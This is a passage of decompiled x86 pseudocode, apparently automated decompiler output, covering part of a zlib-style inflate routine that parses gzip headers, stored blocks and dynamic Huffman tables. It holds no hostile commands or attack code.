												 *(__esp + 0x10) = __edx;
												__ebp = __ebp - 1;
												__eflags = __esi - 0x20;
												if(__esi < 0x20) {
													continue;
												} else {
													goto L50;
												}
												goto L370;
											}
											goto L103;
										}
										goto L370;
									case 3:
										__eflags = __esi - 0x10;
										if(__esi >= 0x10) {
											L59:
											__ecx =  *(__edi + 0x20);
											__eflags = __ecx;
											if(__ecx != 0) {
												__eax = __dl & 0x000000ff;
												 *(__ecx + 8) = __dl & 0x000000ff;
												__ecx = __edx;
												__eax =  *(__edi + 0x20);
												__ecx = __edx >> 8;
												__eflags = __ecx;
												 *(0xc +  *(__edi + 0x20)) = __ecx;
											}
											__eflags =  *(__edi + 0x10) & 0x00000200;
											if(( *(__edi + 0x10) & 0x00000200) != 0) {
												 *(__esp + 0x1c) = __dl;
												__eax = __esp + 0x1c;
												_push(2);
												__eflags = __edx;
												_push(__eax);
												 *(__esp + 0x25) = __dl;
												_push( *(__edi + 0x18));
												__eax = E004102D0();
												__esp = __esp + 0xc;
												 *(__edi + 0x18) = __eax;
											}
											__edx = 0;
											 *__edi = 4;
											 *(__esp + 0x10) = 0;
											__esi = 0;
											__eflags = 0;
											goto L64;
										} else {
											while(1) {
												L57:
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L103;
												}
												__eax =  *__ebx & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebx & 0x000000ff) << __cl;
												__ebx = __ebx + 1;
												__edx = __edx + __eax;
												 *(__esp + 0x14) = __ebx;
												__esi = __esi + 8;
												 *(__esp + 0x10) = __edx;
												__ebp = __ebp - 1;
												__eflags = __esi - 0x10;
												if(__esi < 0x10) {
													continue;
												} else {
													goto L59;
												}
												goto L370;
											}
											goto L103;
										}
										goto L370;
									case 4:
										L64:
										__eflags =  *(__edi + 0x10) & 0x00000400;
										if(( *(__edi + 0x10) & 0x00000400) == 0) {
											__eax =  *(__edi + 0x20);
											__eflags = __eax;
											if(__eax != 0) {
												 *(__eax + 0x10) = 0;
											}
											goto L75;
										} else {
											__eflags = __esi - 0x10;
											if(__esi >= 0x10) {
												L68:
												__eax =  *(__edi + 0x20);
												 *(__edi + 0x40) = __edx;
												__eflags = __eax;
												if(__eax != 0) {
													 *(__eax + 0x14) = __edx;
												}
												__eflags =  *(__edi + 0x10) & 0x00000200;
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													 *(__esp + 0x1c) = __dl;
													__eax = __esp + 0x1c;
													_push(2);
													__eflags = __edx;
													_push(__eax);
													 *(__esp + 0x25) = __dl;
													_push( *(__edi + 0x18));
													__eax = E004102D0();
													__esp = __esp + 0xc;
													 *(__edi + 0x18) = __eax;
												}
												__ecx = 0;
												__esi = 0;
												 *(__esp + 0x10) = 0;
												L75:
												 *__edi = 5;
												goto L76;
											} else {
												while(1) {
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L103;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__edx = __edx + __eax;
													 *(__esp + 0x14) = __ebx;
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													__eflags = __esi - 0x10;
													if(__esi < 0x10) {
														continue;
													} else {
														goto L68;
													}
													goto L370;
												}
												goto L103;
											}
										}
										goto L370;
									case 5:
										L76:
										__eflags =  *(__edi + 0x10) & 0x00000400;
										if(( *(__edi + 0x10) & 0x00000400) == 0) {
											L90:
											 *(__edi + 0x40) = 0;
											 *__edi = 6;
											goto L91;
										} else {
											__ecx =  *(__edi + 0x40);
											 *(__esp + 0x34) = __ecx;
											__eflags = __ecx - __ebp;
											if(__ecx > __ebp) {
												__ecx = __ebp;
												 *(__esp + 0x34) = __ebp;
											}
											__eflags = __ecx;
											if(__ecx != 0) {
												__edx =  *(__edi + 0x20);
												__eflags = __edx;
												if(__edx != 0) {
													__eax =  *(__edx + 0x10);
													 *(__esp + 0x30) = __eax;
													__eflags = __eax;
													if(__eax != 0) {
														__eax =  *(__edx + 0x14);
														__eax =  *(__edx + 0x14) -  *(__edi + 0x40);
														__edx =  *(__edx + 0x18);
														 *(__esp + 0x38) = __eax;
														__eflags = __eax - __edx;
														__eax =  *(__esp + 0x38);
														if(__eflags <= 0) {
															__edx = __ecx;
														} else {
															__edx = __edx - __eax;
														}
														__eax = __eax +  *(__esp + 0x30);
														__eflags = __eax;
														__eax = memcpy(__eax, __ebx, __edx);
														__ecx =  *(__esp + 0x40);
														__esp = __esp + 0xc;
													}
												}
												__eflags =  *(__edi + 0x10) & 0x00000200;
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													_push(__ecx);
													_push(__ebx);
													_push( *(__edi + 0x18));
													__eax = E004102D0();
													__esp = __esp + 0xc;
													 *(__edi + 0x18) = __eax;
												}
												__eax =  *(__esp + 0x34);
												__ebx = __ebx + __eax;
												__ebp = __ebp - __eax;
												 *(__esp + 0x14) = __ebx;
												_t152 = __edi + 0x40;
												 *_t152 =  *(__edi + 0x40) - __eax;
												__eflags =  *_t152;
											}
											__eflags =  *(__edi + 0x40);
											if( *(__edi + 0x40) != 0) {
												goto L103;
											} else {
												goto L90;
											}
										}
										goto L370;
									case 6:
										L91:
										__eflags =  *(__edi + 0x10) & 0x00000800;
										if(( *(__edi + 0x10) & 0x00000800) == 0) {
											__eax =  *(__edi + 0x20);
											__eflags = __eax;
											if(__eax != 0) {
												 *(__eax + 0x1c) = 0;
											}
											goto L116;
										} else {
											__eflags = __ebp;
											if(__ebp == 0) {
												goto L103;
											} else {
												__ecx = 0;
												__eflags = 0;
												while(1) {
													__eax =  *(__ebx + __ecx) & 0x000000ff;
													__ecx = 1 + __ecx;
													 *(__esp + 0x34) = __eax;
													__eax =  *(__edi + 0x20);
													__eflags = __eax;
													if(__eax != 0) {
														__edx =  *(__eax + 0x1c);
														__eflags =  *(__eax + 0x1c);
														if( *(__eax + 0x1c) != 0) {
															__edx =  *(__edi + 0x40);
															__eflags = __edx -  *((intOrPtr*)(__eax + 0x20));
															if(__edx <  *((intOrPtr*)(__eax + 0x20))) {
																__eax =  *(__eax + 0x1c);
																__ebx =  *(__esp + 0x34);
																 *(__eax + __edx) = __bl;
																_t168 = __edi + 0x40;
																 *_t168 = 1 +  *(__edi + 0x40);
																__eflags =  *_t168;
																__ebx =  *(__esp + 0x14);
															}
														}
													}
													__eax =  *(__esp + 0x34);
													__eflags = __eax;
													if(__eax == 0) {
														break;
													}
													__eflags = __ecx - __ebp;
													if(__ecx < __ebp) {
														continue;
													}
													break;
												}
												__eflags =  *(__edi + 0x10) & 0x00000200;
												 *(__esp + 0x38) = __ecx;
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													_push(__ecx);
													_push(__ebx);
													_push( *(__edi + 0x18));
													__eax = E004102D0();
													__ecx =  *(__esp + 0x44);
													__esp = __esp + 0xc;
													 *(__edi + 0x18) = __eax;
													__eax =  *(__esp + 0x34);
												}
												__ebx = __ebx + __ecx;
												__ebp = __ebp - __ecx;
												 *(__esp + 0x14) = __ebx;
												__eflags = __eax;
												if(__eax == 0) {
													L116:
													 *(__edi + 0x40) = 0;
													 *__edi = 7;
													goto L117;
												} else {
													goto L103;
												}
											}
										}
										goto L370;
									case 7:
										L117:
										__eflags =  *(__edi + 0x10) & 0x00001000;
										if(( *(__edi + 0x10) & 0x00001000) == 0) {
											__eax =  *(__edi + 0x20);
											__eflags = __eax;
											if(__eax != 0) {
												 *(__eax + 0x24) = 0;
											}
											goto L132;
										} else {
											__eflags = __ebp;
											if(__ebp == 0) {
												goto L103;
											} else {
												__ecx = 0;
												__eflags = 0;
												while(1) {
													__eax =  *(__ebx + __ecx) & 0x000000ff;
													__ecx = 1 + __ecx;
													 *(__esp + 0x34) = __eax;
													__eax =  *(__edi + 0x20);
													__eflags = __eax;
													if(__eax != 0) {
														__edx =  *(__eax + 0x24);
														__eflags =  *(__eax + 0x24);
														if( *(__eax + 0x24) != 0) {
															__edx =  *(__edi + 0x40);
															__eflags = __edx -  *((intOrPtr*)(__eax + 0x28));
															if(__edx <  *((intOrPtr*)(__eax + 0x28))) {
																__eax =  *(__eax + 0x24);
																__ebx =  *(__esp + 0x34);
																 *(__eax + __edx) = __bl;
																_t213 = __edi + 0x40;
																 *_t213 = 1 +  *(__edi + 0x40);
																__eflags =  *_t213;
																__ebx =  *(__esp + 0x14);
															}
														}
													}
													__eax =  *(__esp + 0x34);
													__eflags = __eax;
													if(__eax == 0) {
														break;
													}
													__eflags = __ecx - __ebp;
													if(__ecx < __ebp) {
														continue;
													}
													break;
												}
												__eflags =  *(__edi + 0x10) & 0x00000200;
												 *(__esp + 0x38) = __ecx;
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													_push(__ecx);
													_push(__ebx);
													_push( *(__edi + 0x18));
													__eax = E004102D0();
													__ecx =  *(__esp + 0x44);
													__esp = __esp + 0xc;
													 *(__edi + 0x18) = __eax;
													__eax =  *(__esp + 0x34);
												}
												__ebx = __ebx + __ecx;
												__ebp = __ebp - __ecx;
												 *(__esp + 0x14) = __ebx;
												__eflags = __eax;
												if(__eax != 0) {
													goto L103;
												} else {
													L132:
													__edx =  *(__esp + 0x10);
													 *__edi = 8;
													goto L133;
												}
											}
										}
										goto L370;
									case 8:
										L133:
										__eflags =  *(__edi + 0x10) & 0x00000200;
										if(( *(__edi + 0x10) & 0x00000200) == 0) {
											L141:
											__ecx =  *(__edi + 0x20);
											__eflags = __ecx;
											if(__ecx != 0) {
												 *(__edi + 0x10) =  *(__edi + 0x10) >> 9;
												__eax =  *(__edi + 0x10) >> 0x00000009 & 0x00000001;
												__eflags = __eax;
												 *(__ecx + 0x2c) = __eax;
												__eax =  *(__edi + 0x20);
												 *( *(__edi + 0x20) + 0x30) = 1;
											}
											_push(0);
											_push(0);
											_push(0);
											__eax = E004102D0();
											__ecx =  *(__esp + 0x54);
											__esp = __esp + 0xc;
											__edx =  *(__esp + 0x10);
											 *(__edi + 0x18) = __eax;
											 *(__ecx + 0x30) = __eax;
											 *__edi = 0xb;
											goto L183;
										} else {
											__eflags = __esi - 0x10;
											if(__esi >= 0x10) {
												L138:
												__eax =  *(__edi + 0x18) & 0x0000ffff;
												__eflags = __edx - __eax;
												if(__edx == __eax) {
													__ecx = 0;
													__esi = 0;
													__eflags = 0;
													 *(__esp + 0x10) = 0;
													goto L141;
												} else {
													__ecx =  *(__esp + 0x48);
													 *(__ecx + 0x18) = "header crc mismatch";
													 *__edi = 0x1d;
												}
												goto L183;
											} else {
												while(1) {
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L103;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__edx = __edx + __eax;
													 *(__esp + 0x14) = __ebx;
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													__eflags = __esi - 0x10;
													if(__esi < 0x10) {
														continue;
													} else {
														goto L138;
													}
													goto L370;
												}
												goto L103;
											}
										}
										goto L370;
									case 9:
										__eflags = __esi - 0x20;
										if(__esi >= 0x20) {
											L147:
											__ecx = __edx;
											__edx = __edx << 0x10;
											__edx & 0x0000ff00 = (__edx & 0x0000ff00) + (__edx << 0x10);
											__edx = __edx >> 8;
											__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
											__eax = __edx >> 0x00000008 & 0x0000ff00;
											__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
											__edx = __edx >> 0x18;
											__ecx =  *(__esp + 0x48);
											__eax = __eax + __edx;
											__edx = 0;
											 *(__edi + 0x18) = __eax;
											 *(__esp + 0x10) = 0;
											__esi = 0;
											__eflags = 0;
											 *(__ecx + 0x30) = __eax;
											 *__edi = 0xa;
											goto L148;
										} else {
											while(1) {
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L103;
												}
												__eax =  *__ebx & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebx & 0x000000ff) << __cl;
												__ebx = __ebx + 1;
												__edx = __edx + __eax;
												 *(__esp + 0x14) = __ebx;
												__esi = __esi + 8;
												 *(__esp + 0x10) = __edx;
												__ebp = __ebp - 1;
												__eflags = __esi - 0x20;
												if(__esi < 0x20) {
													continue;
												} else {
													goto L147;
												}
												goto L370;
											}
											goto L103;
										}
										goto L370;
									case 0xa:
										L148:
										__eflags =  *(0xc + __edi);
										if( *(0xc + __edi) == 0) {
											__eax =  *(__esp + 0x24);
											 *(0xc + __ecx) =  *(__esp + 0x24);
											__eax =  *(__esp + 0x18);
											 *(__ecx + 0x10) =  *(__esp + 0x18);
											__eax = 2;
											 *__ecx = __ebx;
											 *(__ecx + 4) = __ebp;
											 *(__edi + 0x3c) = __esi;
											_pop(__esi);
											_pop(__ebp);
											_pop(__ebx);
											 *(__edi + 0x38) = __edx;
											return 2;
										} else {
											_push(0);
											_push(0);
											_push(0);
											__eax = E00410AD0();
											__ecx =  *(__esp + 0x54);
											__esp = __esp + 0xc;
											__edx =  *(__esp + 0x10);
											 *(__edi + 0x18) = __eax;
											 *(__ecx + 0x30) = __eax;
											 *__edi = 0xb;
											goto L150;
										}
										goto L370;
									case 0xb:
										L150:
										__eax =  *(__esp + 0x4c);
										__eflags = __eax - 5;
										if(__eax == 5) {
											L351:
											__edi =  *(__esp + 0x10);
											__edx = __eax;
											goto L105;
										} else {
											__eflags = __eax - 6;
											if(__eax == 6) {
												goto L351;
											} else {
												goto L152;
											}
										}
										goto L370;
									case 0xc:
										L152:
										__eflags =  *(__edi + 4);
										if( *(__edi + 4) == 0) {
											__eflags = __esi - 3;
											if(__esi >= 3) {
												L157:
												__eax = __edx;
												__edx = __edx >> 1;
												 *(__edi + 4) = __eax;
												__eax = __edx;
												__eax = __edx & 0x00000003;
												__eflags = __eax - 3;
												if(__eax > 3) {
													L160:
													__ecx =  *(__esp + 0x48);
													__edx = __edx >> 2;
													__esi = __esi - 3;
													 *(__esp + 0x10) = __edx;
													goto L183;
												} else {
													switch( *((intOrPtr*)(__eax * 4 +  &M0040FEBC))) {
														case 0:
															 *__edi = 0xd;
															goto L160;
														case 1:
															__eflags =  *(__esp + 0x4c) - 6;
															 *(__edi + 0x4c) = 0x412738;
															 *(__edi + 0x54) = 9;
															 *(__edi + 0x50) = 0x412f38;
															 *(__edi + 0x58) = 5;
															 *__edi = 0x13;
															if( *(__esp + 0x4c) != 6) {
																goto L160;
															} else {
																__edx = __edx >> 2;
																__esi = __esi - 3;
																 *(__esp + 0x10) = __edx;
																goto L103;
															}
															goto L370;
														case 2:
															_t274 = __esp + 0x48; // 0x9
															__ecx =  *_t274;
															__edx = __edx >> 2;
															__esi = __esi - 3;
															 *__edi = 0x10;
															 *(__esp + 0x10) = __edx;
															goto L183;
														case 3:
															_t276 = __esp + 0x48; // 0x9
															__ecx =  *_t276;
															__edx = __edx >> 2;
															__esi = __esi - 3;
															 *(__esp + 0x10) = __edx;
															 *(__ecx + 0x18) = "invalid block type";
															 *__edi = 0x1d;
															goto L183;
													}
												}
											} else {
												while(1) {
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L103;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__edx = __edx + __eax;
													 *(__esp + 0x14) = __ebx;
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													__eflags = __esi - 3;
													if(__esi < 3) {
														continue;
													} else {
														goto L157;
													}
													goto L370;
												}
												goto L103;
											}
										} else {
											__ecx = __esi;
											 *__edi = 0x1a;
											__ecx = __esi & 0x00000007;
											__edx = __edx >> __cl;
											__esi = __esi - __ecx;
											 *(__esp + 0x10) = __edx;
											goto L182;
										}
										goto L370;
									case 0xd:
										__esi = __esi & 0x00000007;
										__edx = __edx >> __cl;
										__esi = __esi - (__esi & 0x00000007);
										 *(__esp + 0x10) = __edx;
										__eflags = __esi - 0x20;
										if(__esi >= 0x20) {
											L169:
											__eax = __edx;
											__ecx = __edx;
											__eax =  !__edx;
											__ecx = __edx & 0x0000ffff;
											__eax =  !__edx >> 0x10;
											__eflags = __ecx - __eax;
											if(__ecx == __eax) {
												__edx = 0;
												 *(__edi + 0x40) = __ecx;
												__esi = 0;
												 *(__esp + 0x10) = 0;
												__eflags =  *(__esp + 0x4c) - 6;
												 *__edi = 0xe;
												if( *(__esp + 0x4c) == 6) {
													__edi = 0;
													goto L104;
												} else {
													__ecx =  *(__esp + 0x48);
													goto L173;
												}
											} else {
												__ecx =  *(__esp + 0x48);
												 *(__ecx + 0x18) = "invalid stored block lengths";
												 *__edi = 0x1d;
												goto L183;
											}
										} else {
											while(1) {
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L103;
												}
												__eax =  *__ebx & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebx & 0x000000ff) << __cl;
												__ebx = __ebx + 1;
												__edx = __edx + __eax;
												 *(__esp + 0x14) = __ebx;
												__esi = __esi + 8;
												 *(__esp + 0x10) = __edx;
												__ebp = __ebp - 1;
												__eflags = __esi - 0x20;
												if(__esi < 0x20) {
													continue;
												} else {
													goto L169;
												}
												goto L370;
											}
											goto L103;
										}
										goto L370;
									case 0xe:
										L173:
										 *__edi = 0xf;
										goto L174;
									case 0xf:
										L174:
										__eax =  *(__edi + 0x40);
										 *(__esp + 0x34) = __eax;
										__eflags = __eax;
										if(__eax == 0) {
											 *__edi = 0xb;
											goto L183;
										} else {
											__eflags = __eax - __ebp;
											if(__eax > __ebp) {
												__eax = __ebp;
												 *(__esp + 0x34) = __ebp;
											}
											__ecx =  *(__esp + 0x18);
											__eflags = __eax - __ecx;
											if(__eax > __ecx) {
												__eax = __ecx;
												 *(__esp + 0x34) = __eax;
											}
											__eflags = __eax;
											if(__eax == 0) {
												goto L103;
											} else {
												__eax = memcpy( *(__esp + 0x2c), __ebx, __eax);
												__eax =  *(__esp + 0x40);
												__esp = __esp + 0xc;
												 *(__esp + 0x18) =  *(__esp + 0x18) - __eax;
												__ebx = __ebx + __eax;
												 *(__esp + 0x24) =  *(__esp + 0x24) + __eax;
												__ebp = __ebp - __eax;
												_t299 = __edi + 0x40;
												 *_t299 =  *(__edi + 0x40) - __eax;
												__eflags =  *_t299;
												 *(__esp + 0x14) = __ebx;
												goto L181;
											}
										}
										goto L370;
									case 0x10:
										__eflags = __esi - 0xe;
										if(__esi >= 0xe) {
											L191:
											__eax = __edx;
											__esi = __esi - 0xe;
											__eax = __edx & 0x0000001f;
											__edx = __edx >> 5;
											 *(__edi + 0x60) = __eax;
											__eax = __edx;
											__eax = __edx & 0x0000001f;
											__edx = __edx >> 5;
											 *(__edi + 0x64) = __eax;
											__eax = __edx;
											__eax = __edx & 0x0000000f;
											__edx = __edx >> 4;
											__eax = __eax + 4;
											 *(__esp + 0x10) = __edx;
											__eflags =  *(__edi + 0x60) - 0x11e;
											 *(__edi + 0x5c) = __eax;
											if( *(__edi + 0x60) > 0x11e) {
												L204:
												 *(__ecx + 0x18) = "too many length or distance symbols";
												 *__edi = 0x1d;
												goto L183;
											} else {
												__eflags =  *(__edi + 0x64) - 0x1e;
												if( *(__edi + 0x64) > 0x1e) {
													goto L204;
												} else {
													 *(__edi + 0x68) = 0;
													 *__edi = 0x11;
													goto L194;
												}
											}
										} else {
											while(1) {
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L103;
												}
												__eax =  *__ebx & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebx & 0x000000ff) << __cl;
												__ebx = __ebx + 1;
												__edx = __edx + __eax;
												 *(__esp + 0x14) = __ebx;
												__esi = __esi + 8;
												 *(__esp + 0x10) = __edx;
												__ebp = __ebp - 1;
												__eflags = __esi - 0xe;
												if(__esi < 0xe) {
													continue;
												} else {
													__ecx =  *(__esp + 0x48);
													goto L191;
												}
												goto L370;
											}
											goto L103;
										}
										goto L370;
									case 0x11:
										L194:
										__eax =  *(__edi + 0x68);
										__eflags =  *(__edi + 0x68) -  *(__edi + 0x5c);
										if( *(__edi + 0x68) >=  *(__edi + 0x5c)) {
											L200:
											__eflags =  *(__edi + 0x68) - 0x13;
											while( *(__edi + 0x68) < 0x13) {
												__eax =  *(__edi + 0x68);
												__ecx = 0;
												__eax =  *(0x412fb8 +  *(__edi + 0x68) * 2) & 0x0000ffff;
												 *((short*)(__edi + 0x70 + ( *(0x412fb8 +  *(__edi + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
												 *(__edi + 0x68) = 1 +  *(__edi + 0x68);
												__eflags =  *(__edi + 0x68) - 0x13;
											}
											__eax = __edi + 0x530;
											 *(__edi + 0x54) = 7;
											__ecx = __edi + 0x6c;
											 *(__edi + 0x4c) = __eax;
											 *(__edi + 0x6c) = __eax;
											__edx = __edi + 0x54;
											__edi + 0x2f0 = __edi + 0x70;
											__eax = E00410DF0(0, __edi + 0x70, 0x13, __edi + 0x6c, __edi + 0x54, __edi + 0x2f0);
											 *(__esp + 0x2c) = __eax;
											__eflags = __eax;
											if(__eax == 0) {
												 *(__edi + 0x68) = 0;
												 *__edi = 0x12;
												goto L206;
											} else {
												__ecx =  *(__esp + 0x48);
												__edx =  *(__esp + 0x10);
												 *(__ecx + 0x18) = "invalid code lengths set";
												 *__edi = 0x1d;
												goto L183;
											}
										} else {
											do {
												__eflags = __esi - 3;
												if(__esi >= 3) {
													goto L199;
												} else {
													while(1) {
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L103;
														}
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 3;
														if(__esi < 3) {
															continue;
														} else {
															goto L199;
														}
														goto L370;
													}
													goto L103;
												}
												goto L370;
												L199:
												__eax =  *(__edi + 0x68);
												__edx = __edx & 0x00000007;
												__edx = __edx >> 3;
												__esi = __esi - 3;
												 *(__esp + 0x10) = __edx;
												__eax =  *(0x412fb8 +  *(__edi + 0x68) * 2) & 0x0000ffff;
												 *((short*)(__edi + 0x70 + ( *(0x412fb8 +  *(__edi + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
												 *(__edi + 0x68) = 1 +  *(__edi + 0x68);
												__eax =  *(__edi + 0x68);
												__eflags =  *(__edi + 0x68) -  *(__edi + 0x5c);
											} while ( *(__edi + 0x68) <  *(__edi + 0x5c));
											goto L200;
										}
										goto L370;
									case 0x12:
										L206:
										__eax =  *(__edi + 0x64);
										__ecx =  *(__edi + 0x68);
										__eax =  *(__edi + 0x64) +  *(__edi + 0x60);
										 *(__esp + 0x34) = __ecx;
										__eflags = __ecx - __eax;
										if(__ecx >= __eax) {
											L242:
											__eflags =  *__edi - 0x1d;
											if( *__edi == 0x1d) {
												L181:
												__edx =  *(__esp + 0x10);
												goto L182;
											} else {
												__eflags =  *((short*)(__edi + 0x270));
												if( *((short*)(__edi + 0x270)) != 0) {
													__eax = __edi + 0x530;
													 *(__edi + 0x54) = 9;
													__ecx = __edi + 0x6c;
													 *(__edi + 0x4c) = __eax;
													 *(__edi + 0x6c) = __eax;
													__edx = __edi + 0x54;
													__edi + 0x2f0 = __edi + 0x70;
													__eax = E00410DF0(1, __edi + 0x70,  *(__edi + 0x60), __edi + 0x6c, __edi + 0x54, __edi + 0x2f0);
													 *(__esp + 0x2c) = __eax;
													__eflags = __eax;
													if(__eax == 0) {
														__eax =  *(__edi + 0x6c);
														__ecx = __edi + 0x6c;
														 *(__edi + 0x50) =  *(__edi + 0x6c);
														__edx = __edi + 0x58;
														__eax = __edi + 0x2f0;
														 *(__edi + 0x58) = 6;
														 *(__edi + 0x60) =  *(__edi + 0x60) + 0x38;
														__eax = __edi + ( *(__edi + 0x60) + 0x38) * 2;
														__eax = E00410DF0(2, __edi + ( *(__edi + 0x60) + 0x38) * 2,  *(__edi + 0x64), __edi + 0x6c, __edi + 0x58, __edi + 0x2f0);
														__edx = __eax;
														 *(__esp + 0x2c) = __edx;
														__eflags = __edx;
														if(__edx == 0) {
															__edx =  *(__esp + 0x4c);
															 *__edi = 0x13;
															__eflags =  *(__esp + 0x4c) - 6;
															if( *(__esp + 0x4c) == 6) {
																__edi =  *(__esp + 0x10);
																goto L105;
															} else {
																__edx =  *(__esp + 0x10);
																__ecx =  *(__esp + 0x48);
																goto L252;
															}
														} else {
															__ecx =  *(__esp + 0x48);
															__edx =  *(__esp + 0x10);
															 *(__ecx + 0x18) = "invalid distances set";
															 *__edi = 0x1d;
															goto L183;
														}
													} else {
														__ecx =  *(__esp + 0x48);
														__edx =  *(__esp + 0x10);
														 *(__ecx + 0x18) = "invalid literal/lengths set";
														 *__edi = 0x1d;
														goto L183;
													}
												} else {
													__ecx =  *(__esp + 0x48);
													__edx =  *(__esp + 0x10);
													 *(__ecx + 0x18) = "invalid code -- missing end-of-block";
													 *__edi = 0x1d;
													goto L183;
												}
											}
										} else {
											__edi =  *(__esp + 0x10);
											do {
												__eax =  *(__esp + 0x40);
												__edx = 1;
												__ecx =  *( *(__esp + 0x40));
												__eax =  *(__esp + 0x20);
												1 << __cl = (1 << __cl) - 1;
												__edx = (0x00000001 << __cl) - 0x00000001 & __edi;
												__eax =  *( *(__esp + 0x20) + 0x4c);
												__eax =  *( *( *(__esp + 0x20) + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __edi) * 4);
												__eax = __eax >> 8;
												__ecx = __cl & 0x000000ff;
												 *(__esp + 0x38) = __eax;
												__eflags = (__cl & 0x000000ff) - __esi;
												if((__cl & 0x000000ff) <= __esi) {
													L212:
													__eax = __eax >> 0x10;
													__eflags = __dx - 0x10;
													if(__eflags >= 0) {
														if(__eflags != 0) {
															__eflags =  *(__esp + 0x3a) - 0x11;
															__edx =  *(__esp + 0x10);
															__ecx = __ah & 0x000000ff;
															if( *(__esp + 0x3a) != 0x11) {
																__edi = __ecx + 7;
																 *(__esp + 0x38) = __ecx;
																__eflags = __esi - __edi;
																if(__esi >= __edi) {
																	L233:
																	__edx = __edx >> __cl;
																	__edx = __edx & 0x0000007f;
																	__eax = (__edx & 0x0000007f) + 0xb;
																	__edx = __edx >> 7;
																	__eflags = __edx;
																	 *(__esp + 0x30) = __eax;
																	__eax = 0xfffffff9;
																	goto L234;
																} else {
																	while(1) {
																		__eflags = __ebp;
																		if(__ebp == 0) {
																			goto L103;
																		}
																		__eax =  *__ebx & 0x000000ff;
																		__ecx = __esi;
																		__eax = ( *__ebx & 0x000000ff) << __cl;
																		__ebx = __ebx + 1;
																		__edx = __edx + __eax;
																		 *(__esp + 0x14) = __ebx;
																		__esi = __esi + 8;
																		 *(__esp + 0x10) = __edx;
																		__ebp = __ebp - 1;
																		__eflags = __esi - __edi;
																		if(__esi < __edi) {
																			continue;
																		} else {
																			__ecx =  *(__esp + 0x38);
																			goto L233;
																		}
																		goto L370;
																	}
																	goto L103;
																}
															} else {
																__edi = __ecx + 3;
																 *(__esp + 0x38) = __ecx;
																__eflags = __esi - __edi;
																if(__esi >= __edi) {
																	L227:
																	__edx = __edx >> __cl;
																	__edx = __edx & 0x00000007;
																	__eax = (__edx & 0x00000007) + 3;
																	__edx = __edx >> 3;
																	 *(__esp + 0x30) = __eax;
																	__eax = 0xfffffffd;
																	L234:
																	__edi =  *(__esp + 0x20);
																	__esi = __esi + __eax;
																	__eflags = __esi;
																	 *(__esp + 0x38) = 0;
																	__eax =  *(__esp + 0x30);
																	goto L235;
																} else {
																	while(1) {
																		__eflags = __ebp;
																		if(__ebp == 0) {
																			goto L103;
																		}
																		__eax =  *__ebx & 0x000000ff;
																		__ecx = __esi;
																		__eax = ( *__ebx & 0x000000ff) << __cl;
																		__ebx = __ebx + 1;
																		__edx = __edx + __eax;
																		 *(__esp + 0x14) = __ebx;
																		__esi = __esi + 8;
																		 *(__esp + 0x10) = __edx;
																		__ebp = __ebp - 1;
																		__eflags = __esi - __edi;
																		if(__esi < __edi) {
																			continue;
																		} else {
																			__ecx =  *(__esp + 0x38);
																			goto L227;
																		}
																		goto L370;
																	}
																	goto L103;
																}
															}
														} else {
															__eax = __eax >> 8;
															__ecx = __cl & 0x000000ff;
															__ecx = (__cl & 0x000000ff) + 2;
															 *(__esp + 0x38) = __ecx;
															__eflags = __esi - __ecx;
															if(__esi >= __ecx) {
																L219:
																__edx =  *(__esp + 0x10);
																__edi =  *(__esp + 0x20);
																__ecx = __ah & 0x000000ff;
																__eax =  *(__esp + 0x34);
																__esi = __esi - (__ah & 0x000000ff);
																__edx =  *(__esp + 0x10) >> __cl;
																 *(__esp + 0x10) = __edx;
																__eflags = __eax;
																if(__eax == 0) {
																	L245:
																	__ecx =  *(__esp + 0x48);
																	 *(__ecx + 0x18) = "invalid bit length repeat";
																	 *__edi = 0x1d;
																	goto L183;
																} else {
																	 *(__esp + 0x38) = __eax;
																	__eax = __edx;
																	__eax = __edx & 0x00000003;
																	__edx = __edx >> 2;
																	__eax = __eax + 3;
																	__esi = __esi - 2;
																	 *(__esp + 0x30) = __eax;
																	L235:
																	 *(__edi + 0x64) =  *(__edi + 0x64) +  *(__edi + 0x60);
																	__eax = __eax +  *(__esp + 0x34);
																	__ebx =  *(__esp + 0x14);
																	 *(__esp + 0x10) = __edx;
																	__eflags = __eax -  *(__edi + 0x64) +  *(__edi + 0x60);
																	if(__eax >  *(__edi + 0x64) +  *(__edi + 0x60)) {
																		goto L245;
																	} else {
																		__ecx =  *(__esp + 0x30);
																		__eflags = __ecx;
